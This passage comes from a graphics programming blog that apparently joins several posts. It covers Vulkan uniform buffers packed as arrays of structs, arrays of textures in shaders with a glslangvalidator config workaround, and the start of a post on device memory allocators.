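static_assert(offsetof(LayoutB, x) == 32, "x should start at byte 32");
```

<p>The asserts cost nothing at runtime, and they catch the case where someone adds a member to one struct and forgets the other.</p>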
<p>Once the structs are set up, you just need some quick pointer math to get them into one buffer:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="kt">char</span><span class="o">*</span> <span class="n">sharedData</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span><span class="o">*</span><span class="p">)</span><span class="n">malloc</span><span class="p">(</span><span class="k">sizeof</span><span class="p">(</span><span class="n">LayoutA</span><span class="p">)</span> <span class="o">*</span> <span class="n">BUFFER_ARRAY_SIZE</span><span class="p">);</span>
<span class="n">LayoutA</span> <span class="n">first</span> <span class="o">=</span> <span class="p">{</span><span class="n">glm</span><span class="o">::</span><span class="n">vec4</span><span class="p">(</span><span class="mf">0.5</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="mi">0</span><span class="p">),</span> <span class="n">glm</span><span class="o">::</span><span class="n">vec4</span><span class="p">(</span><span class="mf">0.25</span><span class="p">,</span><span class="mf">0.5</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="mi">0</span><span class="p">),</span> <span class="n">glm</span><span class="o">::</span><span class="n">vec4</span><span class="p">(</span><span class="mf">0.0</span><span class="p">,</span><span class="mf">0.25</span><span class="p">,</span><span class="mf">0.25</span><span class="p">,</span><span class="mi">1</span><span class="p">)};</span>
<span class="n">LayoutB</span> <span class="n">second</span> <span class="o">=</span> <span class="p">{</span><span class="mf">1.0f</span><span class="p">,</span> <span class="n">glm</span><span class="o">::</span><span class="n">vec4</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">),</span> <span class="mi">1</span><span class="p">};</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">writeLocation</span> <span class="o">=</span> <span class="n">sharedData</span><span class="p">;</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">writeLocation</span><span class="p">,</span> <span class="o">&</span><span class="n">first</span><span class="p">,</span> <span class="n">SHARED_UNIFORM_SIZE</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">((</span><span class="n">writeLocation</span> <span class="o">+=</span> <span class="n">SHARED_UNIFORM_SIZE</span><span class="p">),</span> <span class="o">&</span><span class="n">second</span><span class="p">,</span> <span class="n">SHARED_UNIFORM_SIZE</span><span class="p">);</span></code></pre></figure>
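<p>The pointer math above can be wrapped in a small helper so that call sites only deal in slot indices. This is a sketch rather than code from the demo project: <code>slotOffset</code> and <code>writeSlot</code> are names I made up for illustration, and the CPU-side copy is a <code>std::vector&lt;char&gt;</code> instead of a raw <code>malloc</code>.</p>

```cpp
#include <cassert>
#include <cstddef>
#include <cstring>
#include <vector>

constexpr std::size_t SHARED_UNIFORM_SIZE = 48; // bytes per array element
constexpr std::size_t BUFFER_ARRAY_SIZE   = 8;  // elements in the shader array

// Byte offset of a slot inside the shared array.
constexpr std::size_t slotOffset(std::size_t index)
{
    return index * SHARED_UNIFORM_SIZE;
}

// Copies one struct into the given slot of the CPU-side copy of the array.
// T can be any struct whose size is exactly SHARED_UNIFORM_SIZE.
template <typename T>
void writeSlot(std::vector<char>& sharedData, std::size_t index, const T& value)
{
    static_assert(sizeof(T) == SHARED_UNIFORM_SIZE, "struct must fill exactly one slot");
    assert(index < BUFFER_ARRAY_SIZE);
    assert(sharedData.size() >= SHARED_UNIFORM_SIZE * BUFFER_ARRAY_SIZE);
    std::memcpy(sharedData.data() + slotOffset(index), &value, sizeof(T));
}
```

<p>With this in place, the two <code>memcpy</code> calls become <code>writeSlot(sharedData, 0, first)</code> and <code>writeSlot(sharedData, 1, second)</code>, and a struct of the wrong size fails to compile instead of silently corrupting its neighbour.</p>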
<p>This works, but if you’re like me, you likely don’t want to have to recompile your c++ code every time a shader changes. In the past, I got around this by using a program I wrote for my <a href="https://github.com/khalladay/VkMaterialSystem">material system</a> (called the “ShaderPipeline”) that uses <a href="https://github.com/KhronosGroup/SPIRV-Cross">SPIR-V Cross</a> to generate json descriptions of the shaders that I use. One part of this description is the size and offset of each member of a uniform buffer object, but with the array of structs approach here, SPIR-V Cross ends up just telling you details about the size of the entire array:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="s">"descriptor_sets"</span><span class="o">:</span> <span class="p">[</span>
<span class="p">{</span>
<span class="s">"set"</span><span class="o">:</span> <span class="mi">0</span><span class="p">,</span>
<span class="s">"binding"</span><span class="o">:</span> <span class="mi">0</span><span class="p">,</span>
<span class="s">"name"</span><span class="o">:</span> <span class="s">"DATA_48"</span><span class="p">,</span>
<span class="s">"size"</span><span class="o">:</span> <span class="mi">384</span><span class="p">,</span>
<span class="s">"arrayLen"</span><span class="o">:</span> <span class="mi">1</span><span class="p">,</span>
<span class="s">"type"</span><span class="o">:</span> <span class="s">"UNIFORM"</span><span class="p">,</span>
<span class="s">"members"</span><span class="o">:</span> <span class="p">[</span>
<span class="p">{</span>
<span class="s">"name"</span><span class="o">:</span> <span class="s">"data"</span><span class="p">,</span>
<span class="s">"size"</span><span class="o">:</span> <span class="mi">384</span><span class="p">,</span>
<span class="s">"offset"</span><span class="o">:</span> <span class="mi">0</span>
<span class="p">}</span>
<span class="p">]</span>
<span class="p">}]</span></code></pre></figure>
<p>This isn’t super helpful, which I think means that I’m going to have to add some support for GLSL comment annotations to let this tool spit out more information about the “Data48” struct. However, my main point here is that this “array of structs” approach does not require you to recompile your c++ code to make shader changes. Once you know the offsets for each variable, you can just do some quick pointer math and write things where they need to go in a generic way.</p>
<p>Side Note: this ShaderPipeline tool is turning out to be way more useful than the material system demo. I think it’s soon going to need its own GitHub repo.</p>
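<p>To make the “generic way” a bit more concrete, here’s a rough sketch of what a data driven write could look like once per-member offsets are available. Everything in it is hypothetical: <code>MemberInfo</code>, <code>BlockLayout</code> and <code>writeMember</code> are names I invented for illustration, and they don’t reflect what the ShaderPipeline tool currently outputs.</p>

```cpp
#include <cstddef>
#include <cstring>
#include <string>
#include <unordered_map>
#include <vector>

// Hypothetical reflection record for one struct member (e.g. loaded from json).
struct MemberInfo
{
    std::size_t offset; // byte offset inside one array element
    std::size_t size;   // byte size of the member
};

// Hypothetical description of one "array of structs" uniform block.
struct BlockLayout
{
    std::size_t stride; // bytes per array element (48 in the demo)
    std::unordered_map<std::string, MemberInfo> members;
};

// Writes `size` bytes into member `name` of array element `index`.
// Returns false if the member is unknown or the write would not fit.
bool writeMember(std::vector<char>& buffer, const BlockLayout& layout,
                 std::size_t index, const std::string& name,
                 const void* src, std::size_t size)
{
    auto it = layout.members.find(name);
    if (it == layout.members.end() || size > it->second.size)
        return false;

    const std::size_t dst = index * layout.stride + it->second.offset;
    if (dst + size > buffer.size())
        return false;

    std::memcpy(buffer.data() + dst, src, size);
    return true;
}
```

<p>Nothing here knows about <code>LayoutA</code> or <code>LayoutB</code>, so changing a shader only means regenerating the layout description, not recompiling.</p>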
<h2 id="a-potential-implementation-idea">A Potential Implementation Idea</h2>
<p>I haven’t tried this out yet, so take it with a grain of salt, but it seems like this technique would make it possible to keep uniform data centralized in a few different memory pools, one for each size of uniform buffer object (ie: a pool for 48 byte buffers, a pool for 128 byte, etc). Whenever a material instance gets created, it just gets assigned a slot in the appropriate pool for its data. Then when it comes time to actually use the material, it just needs to know enough to pass the index (or indices in the case of multiple uniforms) via push constants to select the right data.</p>
<p>It might even be possible to use this separation of materials to figure out which thread should build the commands for drawing each object, so that each command list that gets built doesn’t necessarily even need to bind every one of these uniform arrays.</p>
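<p>As a rough illustration of the pool idea, the bookkeeping side could be as small as the sketch below. Like the idea itself, this is untested in a real renderer, and all the names (<code>UniformPool</code>, <code>UniformSlot</code>, <code>UniformPools</code>) are made up for the example. It also ignores the fact that the array length in the shader is fixed, so a real version would need a per-pool capacity.</p>

```cpp
#include <cstddef>
#include <cstdint>
#include <map>
#include <vector>

// One pool per uniform struct size; each pool is an array of equally sized slots.
struct UniformPool
{
    std::size_t slotSize = 0;
    std::vector<char> data;      // CPU-side copy of the pool contents
    std::uint32_t slotCount = 0; // number of slots handed out so far
};

// Identifies where a material instance's uniform data lives.
struct UniformSlot
{
    std::size_t poolSize; // which pool (keyed by struct size in bytes)
    std::uint32_t index;  // value to hand to the shader via push constant
};

class UniformPools
{
public:
    // Hands out the next free slot in the pool for `structSize` byte structs,
    // creating that pool on first use.
    UniformSlot allocate(std::size_t structSize)
    {
        UniformPool& pool = pools_[structSize];
        pool.slotSize = structSize;
        pool.data.resize(pool.data.size() + structSize);
        return UniformSlot{structSize, pool.slotCount++};
    }

    std::size_t poolCount() const { return pools_.size(); }

private:
    std::map<std::size_t, UniformPool> pools_;
};
```

<p>A material instance would hold on to its <code>UniformSlot</code> and push <code>index</code> as the <code>dataIdx</code> push constant at draw time.</p>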
<p>I think this is the approach I’m going to try first in the next non-demo project that I make with Vulkan (whatever/whenever that is), but as simple as it sounds on paper, there’s already at least one more factor that needs to be mentioned:</p>
<h2 id="handling-large-buffer-updates">Handling Large Buffer Updates</h2>
<p>This approach to uniform data runs into problems pretty quickly as you add more entries to the arrays of data. The <a href="https://www.khronos.org/registry/vulkan/specs/1.0/man/html/vkCmdUpdateBuffer.html">Vulkan spec</a> states that:</p>
<blockquote>
<p>Buffer updates performed with vkCmdUpdateBuffer first copy the data into command buffer memory when the command is recorded (which requires additional storage and may incur an additional allocation), and then copy the data from the command buffer into dstBuffer when the command is executed on a device.</p>
</blockquote>
<blockquote>
<p>The additional cost of this functionality compared to buffer to buffer copies means it is only recommended for very small amounts of data, and is why it is limited to only 65536 bytes.</p>
</blockquote>
<blockquote>
<p>Applications can work around this by issuing multiple vkCmdUpdateBuffer commands to different ranges of the same buffer, but it is strongly recommended that they should not.</p>
</blockquote>
<p>So once we exceed 65536 bytes in one of our buffer pools, we need to find a different way to update the data there. With the 48 byte buffers we’re using above, we won’t hit that limit for a while, but a hypothetical 128 byte uniform buffer array would hit the limit at exactly 512 entries, so a 513th entry would push it over.</p>
<p>It seems like the right way to address this is to limit the size of any VkBuffer that stores data that needs to be modified, and then just before the renderer begins assembling command lists, copy those buffers into a larger buffer that exceeds the 65536 limit. This approach will add some additional complexity to setting up material data / managing those buffer pools, but wouldn’t increase any complexity as far as our actual rendering logic is concerned… which I like.</p>
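<p>The arithmetic behind those numbers is easy to check at compile time. This is just a sketch; <code>MAX_UPDATE_BYTES</code> and <code>maxEntriesPerUpdate</code> are names I picked for the example, and the only value taken from the spec is the 65536 byte limit quoted above.</p>

```cpp
#include <cstddef>

// Largest update a single vkCmdUpdateBuffer call accepts, per the spec text above.
constexpr std::size_t MAX_UPDATE_BYTES = 65536;

// Largest number of array entries of `entrySize` bytes that one update can cover.
constexpr std::size_t maxEntriesPerUpdate(std::size_t entrySize)
{
    return MAX_UPDATE_BYTES / entrySize;
}

// 48 byte entries: 1365 fit (65520 bytes), a 1366th would not.
static_assert(maxEntriesPerUpdate(48) == 1365, "48 byte entries");

// 128 byte entries: 512 fit exactly (65536 bytes), a 513th would not.
static_assert(maxEntriesPerUpdate(128) == 512, "128 byte entries");
```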
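<p>One way to picture that copy step is as a list of copy regions, one per small buffer, packed back to back in the large one. The sketch below only plans the offsets and doesn’t call into Vulkan at all: <code>CopyRegion</code> is a stand-in I defined with the same three fields as <code>VkBufferCopy</code> so it compiles without the Vulkan headers, and <code>planCopies</code> is a hypothetical helper, not something from the demo project.</p>

```cpp
#include <cstddef>
#include <vector>

// Stand-in for VkBufferCopy (srcOffset, dstOffset, size), so this sketch
// compiles without the Vulkan headers (assumption for illustration).
struct CopyRegion
{
    std::size_t srcOffset;
    std::size_t dstOffset;
    std::size_t size;
};

constexpr std::size_t MAX_UPDATE_BYTES = 65536;

// Given the sizes of several small, updatable buffers, returns where each one
// lands in the large buffer when they are packed back to back.
// Returns an empty plan if any small buffer is too big to update in one call.
std::vector<CopyRegion> planCopies(const std::vector<std::size_t>& smallBufferSizes)
{
    std::vector<CopyRegion> regions;
    std::size_t dstOffset = 0;
    for (std::size_t size : smallBufferSizes)
    {
        if (size > MAX_UPDATE_BYTES)
            return {};
        regions.push_back(CopyRegion{0, dstOffset, size});
        dstOffset += size;
    }
    return regions;
}
```

<p>Each region would then feed one buffer to buffer copy from a small buffer into the big one, which keeps the rendering code pointed at a single large buffer.</p>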
<h2 id="wrap-up">Wrap Up</h2>
<p>I’ll mention again that I haven’t actually tried this out in a real application, and it could be that there are performance costs associated with binding really large buffers, or some other performance gotcha that I’m going to run into with this approach (in fact, there’s almost certainly at least 10 things I’m not considering), but I really like this approach to working with uniform data, so I’m going to start giving it a shot in larger projects.</p>
<p>This was a really fun post to write and fun project to put together. Between my last post about texture arrays, and this one, I feel like I’m starting to get a good grip on how Vulkan handles Descriptor Sets, and how things map from GLSL to Vulkan.</p>
<p>As always, if you want to say hi, or point out something that I got wrong (or didn’t think about), send a message to @khalladay <a href="https://twitter.com/khalladay">on Twitter</a> or <a href="https://mastodon.gamedev.place/@khalladay">on Mastodon</a>. Have a good one!</p>
Using Arrays of Textures in Vulkan Shaders2018-01-28T00:00:00+00:00http://kylehalladay.com/blog/tutorial/vulkan/2018/01/28/Textue-Arrays-Vulkan<p>Lately I’ve been trying to wrap my head around how to effectively deal with textures in Vulkan. I don’t want any descriptor sets that need to be bound on a per object basis, which means that just sticking each texture into its own set binding isn’t going to work. Instead, thanks to the <a href="http://32ipi028l5q82yhj72224m8j-wpengine.netdna-ssl.com/wp-content/uploads/2016/03/VulkanFastPaths.pdf">Vulkan Fast Paths</a> presentation from AMD, I’ve been looking into using a global array of textures that stores all my textures in a descriptor set that I can bind at the beginning of the frame.</p>
<p>The AMD presentation doesn’t actually cover how to set up an array of textures in Vulkan, and I couldn’t find a good explanation of how to do that anywhere online, so now that I’ve figured it out I want to post a quick tutorial on here about it for the next person who gets stuck. I’ll go more in depth about how this array fits into my material system in a later post, but for now I just want to cover the nuts and bolts of setting up a shader to use an array of textures.</p>
<p>One more thing to note before I get started: If you’re looking for a way to work with images of the same size, Sascha Willems has a great example of using a sampler2DArray in his <a href="https://github.com/SaschaWillems/Vulkan">Vulkan Examples Project</a>. The advantage of using an array of textures instead of something like a sampler2DArray is that the array of textures approach supports storing multiple image sizes in the same array by default. I don’t know how much (if any) of a performance penalty you pay for using an array of textures over a sampler2DArray.</p>
<p>With all that said, the goal of this post is going to be to walk through how to set up a Vulkan app so that you can use a shader like this one:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#version 450 core
#extension GL_ARB_separate_shader_objects : enable
</span>
<span class="n">layout</span><span class="p">(</span><span class="n">set</span> <span class="o">=</span> <span class="mi">0</span><span class="p">,</span> <span class="n">binding</span> <span class="o">=</span> <span class="mi">0</span><span class="p">)</span> <span class="n">uniform</span> <span class="n">sampler</span> <span class="n">samp</span><span class="p">;</span>
<span class="n">layout</span><span class="p">(</span><span class="n">set</span> <span class="o">=</span> <span class="mi">0</span><span class="p">,</span> <span class="n">binding</span> <span class="o">=</span> <span class="mi">1</span><span class="p">)</span> <span class="n">uniform</span> <span class="n">texture2D</span> <span class="n">textures</span><span class="p">[</span><span class="mi">8</span><span class="p">];</span>
<span class="n">layout</span><span class="p">(</span><span class="n">push_constant</span><span class="p">)</span> <span class="n">uniform</span> <span class="n">PER_OBJECT</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">imgIdx</span><span class="p">;</span>
<span class="p">}</span><span class="n">pc</span><span class="p">;</span>
<span class="n">layout</span><span class="p">(</span><span class="n">location</span> <span class="o">=</span> <span class="mi">0</span><span class="p">)</span> <span class="n">out</span> <span class="n">vec4</span> <span class="n">outColor</span><span class="p">;</span>
<span class="n">layout</span><span class="p">(</span><span class="n">location</span> <span class="o">=</span> <span class="mi">0</span><span class="p">)</span> <span class="n">in</span> <span class="n">vec2</span> <span class="n">fragUV</span><span class="p">;</span>
<span class="kt">void</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">outColor</span> <span class="o">=</span> <span class="n">texture</span><span class="p">(</span><span class="n">sampler2D</span><span class="p">(</span><span class="n">textures</span><span class="p">[</span><span class="n">pc</span><span class="p">.</span><span class="n">imgIdx</span><span class="p">],</span> <span class="n">samp</span><span class="p">),</span> <span class="n">fragUV</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>I’ve put all the code for this up in an <a href="https://github.com/khalladay/VulkanDemoProjects/tree/master/VulkanDemoProjects/TextureArrays">example project</a> on github, which renders a full screen quad with the above shader, and changes what image is displayed by updating the imgIdx variable in the push constant, so feel free to grab that and take a look. I’m going to deep dive into parts of that code for the remainder of this post.</p>
<h2 id="setting-up-the-descriptor-set-layout">Setting Up The Descriptor Set Layout</h2>
<p>Setting up a descriptor set binding to work with an array of textures looks very similar to setting it up to work with a single texture. The main difference is the “descriptorCount” variable on the VkDescriptorSetLayoutBinding structure: with a single texture you’d set this to 1, whereas with an array of textures, you set that variable to the number of elements in your array. For the above shader, the layout binding structure for the texture array might look like this:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">VkDescriptorSetLayoutBinding</span> <span class="n">layoutBinding</span> <span class="o">=</span> <span class="p">{};</span>
<span class="n">layoutBinding</span><span class="p">.</span><span class="n">descriptorCount</span> <span class="o">=</span> <span class="mi">8</span><span class="p">;</span>
<span class="n">layoutBinding</span><span class="p">.</span><span class="n">binding</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
<span class="n">layoutBinding</span><span class="p">.</span><span class="n">stageFlags</span> <span class="o">=</span> <span class="n">VK_SHADER_STAGE_FRAGMENT_BIT</span><span class="p">;</span>
<span class="n">layoutBinding</span><span class="p">.</span><span class="n">descriptorType</span> <span class="o">=</span> <span class="n">VK_DESCRIPTOR_TYPE_SAMPLED_IMAGE</span><span class="p">;</span>
<span class="n">layoutBinding</span><span class="p">.</span><span class="n">pImmutableSamplers</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span></code></pre></figure>
<p>In hindsight, this is pretty obvious, but it took me a while to realize that “descriptorCount” was the right spot for this information.</p>
<p>Once the above is set up, you just create your DescriptorSet (and DescriptorSetLayout) like you would with any other layout binding types. The demo app I posted has a working example of all of that.</p>
<h2 id="writing-the-descriptor-sets">Writing the Descriptor Sets</h2>
<p>Similar to the above, writing a texture array to a descriptor set is much more straightforward than it seems at first. The key is to have your VkDescriptorImageInfo structs already in an array. If you aren’t using a combined image sampler, you don’t actually need to fill in the sampler value on these structs. In my demo project, I set up this array like so:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">VkDescriptorImageInfo</span> <span class="n">descriptorImageInfos</span><span class="p">[</span><span class="n">TEXTURE_ARRAY_SIZE</span><span class="p">];</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">uint32_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">TEXTURE_ARRAY_SIZE</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">demoData</span><span class="p">.</span><span class="n">descriptorImageInfos</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">sampler</span> <span class="o">=</span> <span class="n">nullptr</span><span class="p">;</span>
<span class="n">demoData</span><span class="p">.</span><span class="n">descriptorImageInfos</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">imageLayout</span> <span class="o">=</span> <span class="n">VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL</span><span class="p">;</span>
<span class="n">demoData</span><span class="p">.</span><span class="n">descriptorImageInfos</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">imageView</span> <span class="o">=</span> <span class="n">demoData</span><span class="p">.</span><span class="n">textures</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">view</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>In a non-contrived application, you likely won’t have all the imageViews already in a neat little array like this, but it doesn’t matter how those image views are laid out, as long as the DescriptorImageInfo structs you use are in an array of some kind.</p>
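<p>As a rough sketch of that idea, here is one way to gather image views that are scattered across other objects into a single contiguous array. Everything in it is an assumption made for illustration: ImageViewHandle and ImageInfo are stand-ins for VkImageView and VkDescriptorImageInfo (so it compiles without the Vulkan headers), and Texture, buildImageInfos, and the fallback view are hypothetical names that don’t come from the demo project.</p>

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

// Stand-ins for VkImageView and VkDescriptorImageInfo so the sketch compiles
// without the Vulkan headers. In real code, use the Vulkan types directly.
using ImageViewHandle = std::uint64_t;

struct ImageInfo
{
    ImageViewHandle imageView;
    std::uint32_t   imageLayout;
};

// Placeholder for VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL.
constexpr std::uint32_t kShaderReadOnlyLayout = 5;

// Hypothetical texture record: the view lives inside a larger object.
struct Texture
{
    ImageViewHandle view;
    bool            loaded;
};

// Build one contiguous array of image infos, one per slot in the shader array.
// Slots without a loaded texture point at fallbackView, so every slot holds
// a usable view.
std::vector<ImageInfo> buildImageInfos(const std::vector<Texture>& textures,
                                       std::size_t slotCount,
                                       ImageViewHandle fallbackView)
{
    assert(textures.size() <= slotCount);
    std::vector<ImageInfo> infos(slotCount, ImageInfo{fallbackView, kShaderReadOnlyLayout});
    for (std::size_t i = 0; i < textures.size(); ++i)
    {
        if (textures[i].loaded)
        {
            infos[i].imageView = textures[i].view;
        }
    }
    return infos;
}
```

<p>With the real Vulkan types, the vector’s data() pointer and size() would be what you hand to pImageInfo and descriptorCount respectively.</p>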
<p>Once you’ve set up those structs, setting up the rest of the WriteDescriptorSet for the array of textures is very simple:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">VkWriteDescriptorSet</span> <span class="n">setWrites</span><span class="p">[</span><span class="mi">2</span><span class="p">];</span>
<span class="n">setWrites</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="p">{};</span>
<span class="n">setWrites</span><span class="p">[</span><span class="mi">1</span><span class="p">].</span><span class="n">sType</span> <span class="o">=</span> <span class="n">VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET</span><span class="p">;</span>
<span class="n">setWrites</span><span class="p">[</span><span class="mi">1</span><span class="p">].</span><span class="n">dstBinding</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
<span class="n">setWrites</span><span class="p">[</span><span class="mi">1</span><span class="p">].</span><span class="n">dstArrayElement</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">setWrites</span><span class="p">[</span><span class="mi">1</span><span class="p">].</span><span class="n">descriptorType</span> <span class="o">=</span> <span class="n">VK_DESCRIPTOR_TYPE_SAMPLED_IMAGE</span><span class="p">;</span>
<span class="n">setWrites</span><span class="p">[</span><span class="mi">1</span><span class="p">].</span><span class="n">descriptorCount</span> <span class="o">=</span> <span class="n">TEXTURE_ARRAY_SIZE</span><span class="p">;</span>
<span class="n">setWrites</span><span class="p">[</span><span class="mi">1</span><span class="p">].</span><span class="n">pBufferInfo</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">setWrites</span><span class="p">[</span><span class="mi">1</span><span class="p">].</span><span class="n">dstSet</span> <span class="o">=</span> <span class="n">demoData</span><span class="p">.</span><span class="n">descriptorSet</span><span class="p">;</span>
<span class="n">setWrites</span><span class="p">[</span><span class="mi">1</span><span class="p">].</span><span class="n">pImageInfo</span> <span class="o">=</span> <span class="n">demoData</span><span class="p">.</span><span class="n">descriptorImageInfos</span><span class="p">;</span></code></pre></figure>
<p>Note that just like earlier with the DescriptorSetLayoutBinding, the descriptorCount variable here is where you need to specify the length of your array.</p>
<h2 id="glslangvalidator-and-large-arrays">GlslangValidator And Large Arrays</h2>
<p>If you’re using the standalone glslangvalidator tool from the <a href="https://github.com/KhronosGroup/glslang">glslang project</a>, you’re going to run into some issues if you try to make a large array of textures (i.e. more than 80). If you do that, you’ll see an error message like the following:</p>
<blockquote>
<p>‘binding’ : sampler binding not less than gl_MaxCombinedTextureImageUnits (using array)</p>
</blockquote>
<p>This was a problem for me because I want to keep all the textures used in any given frame bound, so my initial array size was set to 4096 (with all of those image views defaulting to the same image). As you probably guessed from the “gl_” prefix in the error being generated, this error doesn’t actually apply to Vulkan shaders, so if you’re sure that your shader will never be used by OpenGL, you need to tell the compiler not to worry about gl_MaxCombinedTextureImageUnits.</p>
<p>To do this, you need to create a device capabilities config file, like so:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"> <span class="s">"glslangvalidator -c > myconf.conf"</span>
</code></pre></figure>
<p>It’s important that your file uses the .conf extension, because that’s the extension that glslangvalidator will look for in its argument list to know if an alternate config file is being provided.</p>
<p>Once you have this config file, all you need to do is open it up in your favourite text editor and look for the “MaxCombinedTextureImageUnits” line:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">MaxVertexAttribs</span> <span class="mi">64</span>
<span class="n">MaxVertexUniformComponents</span> <span class="mi">4096</span>
<span class="n">MaxVaryingFloats</span> <span class="mi">64</span>
<span class="n">MaxVertexTextureImageUnits</span> <span class="mi">32</span>
<span class="n">MaxCombinedTextureImageUnits</span> <span class="mi">80</span>
<span class="n">MaxTextureImageUnits</span> <span class="mi">32</span></code></pre></figure>
<p>Change that 80 to a really big number and you’re on your way. One thing to note is that I ran into some issues when I did this originally because I generated the config file using powershell, which defaults to writing text files out using UCS2-LE text encoding. You don’t want that. Make sure that your config file is set to a sane encoding, like UTF-8, otherwise the validator won’t be able to read the file back in properly.</p>
<p>Once your config file is properly encoded and allows lots of textures, you’re ready to recompile your shader. This time, invoke the compiler like so:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">glslangvalidator</span> <span class="o">-</span><span class="n">V</span> <span class="n">myfile</span><span class="p">.</span><span class="n">frag</span> <span class="n">myconf</span><span class="p">.</span><span class="n">conf</span></code></pre></figure>
<p>As long as your config file uses the .conf extension, that should be all you need to get it to stop complaining and do its job.</p>
<h2 id="thats-all-folks">That’s All Folks!</h2>
<p>When all the above is done, you should be able to simply pass your array index via push constants the same way you’d pass anything else via push constants and be on your way. If anything above was unclear, let me point you again in the direction of the <a href="https://github.com/khalladay/VulkanDemoProjects/tree/master/VulkanDemoProjects/TextureArrays">demo project</a> on github, which will provide you with a relatively small working example.</p>
<p>Hopefully this was helpful! I realize it’s a short post, and there’s nothing here that’s groundbreaking, but (imo), Vulkan needs more easily digestible tutorial content, so here this post is. In any case, if you want to say hi, send a message to @khalladay <a href="https://twitter.com/khalladay">on Twitter</a> or <a href="https://mastodon.gamedev.place/@khalladay">on Mastodon</a>. Thanks for reading!</p>
A Simple Device Memory Allocator For Vulkan2017-12-13T00:00:00+00:00http://kylehalladay.com/blog/tutorial/2017/12/13/Custom-Allocators-Vulkan<p>Last month, I posted about the <a href="http://kylehalladay.com/blog/tutorial/2017/11/27/Vulkan-Material-System.html">material system</a> that I’ve been trying to piece together, and talked about how the next step for that system was going to be to extend it to handle material instances. This sounded like a great next step until I started building it and realized that in order for this to work with arbitrary data, I needed to sort out how I wanted to manage allocating arbitrary amounts of Vulkan device memory.</p>
<p>Vulkan only gives you a limited number of allocations that you’re allowed to have active at one time (set by your gpu), so I can’t keep creating new allocations for every new material, and I definitely can’t for material instances. So instead of pressing forward with the material system, I took a quick detour to figure out how to write a memory allocator that would solve this problem for me.</p>
<p>If you’re not interested in the implementation details, GPUOpen already has a very capable memory allocator that’s open source and ready to use, and is way better than what I’ve put together (you can get it <a href="https://github.com/GPUOpen-LibrariesAndSDKs/VulkanMemoryAllocator">here</a>) but I wanted to figure out how to write my own, which is what I’m going to talk about for the rest of this post.</p>
<div align="center">
<img src="/images/post_images/2017-12-14/duck.jpg" />
<font size="2">I have no idea how to take a picture of an allocator</font>
<br /><br />
</div>
<h2 id="understanding-vulkan-memory">Understanding Vulkan Memory</h2>
<p>The first thing I needed to take a look at was how exactly Vulkan memory worked, and there wasn’t a better spot than the output of <a href="https://www.khronos.org/registry/vulkan/specs/1.0/man/html/vkGetPhysicalDeviceMemoryProperties.html">vkGetPhysicalDeviceMemoryProperties</a>.</p>
<p>On my GPU (GTX 1060), this reported that my device had 2 memory heaps: one that was 6 GB, and one that was 16 GB. This was interesting because according to NVidia’s system stats, my gpu only has 14.2 GB of total graphics memory (and I never really figured out what this discrepancy was all about). However, the 6 GB number made sense, since that’s how much dedicated video memory I have on my card.</p>
<p>The only other information given about these heaps was a “flags” variable. A quick look at the Vulkan docs reveals that there’s only one flag defined right now:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">typedef</span> <span class="k">enum</span> <span class="n">VkMemoryHeapFlagBits</span> <span class="p">{</span>
<span class="n">VK_MEMORY_HEAP_DEVICE_LOCAL_BIT</span> <span class="o">=</span> <span class="mh">0x00000001</span><span class="p">,</span>
<span class="p">}</span> <span class="n">VkMemoryHeapFlagBits</span><span class="p">;</span></code></pre></figure>
<p>Which makes sense because my 6 GB heap is listed with a flags value of 1, making it the device local memory (which is what I’d expect, given that it’s my dedicated memory), and the other heap has a flags value of 0, which I assume just means that anything goes with that heap.</p>
<p>The other thing returned by vkGetPhysicalDeviceMemoryProperties is an array of memory types. These are important because when you’re allocating memory pools, you can’t mix memory types, so unlike on the CPU where you can malloc up as much as you want and parcel it out to anything, in Vulkan, you need multiple large allocations that you parcel out from based on type.</p>
<p>Vulkan memory types are identified by what heap they belong to, and which of the following property bits they have set:</p>
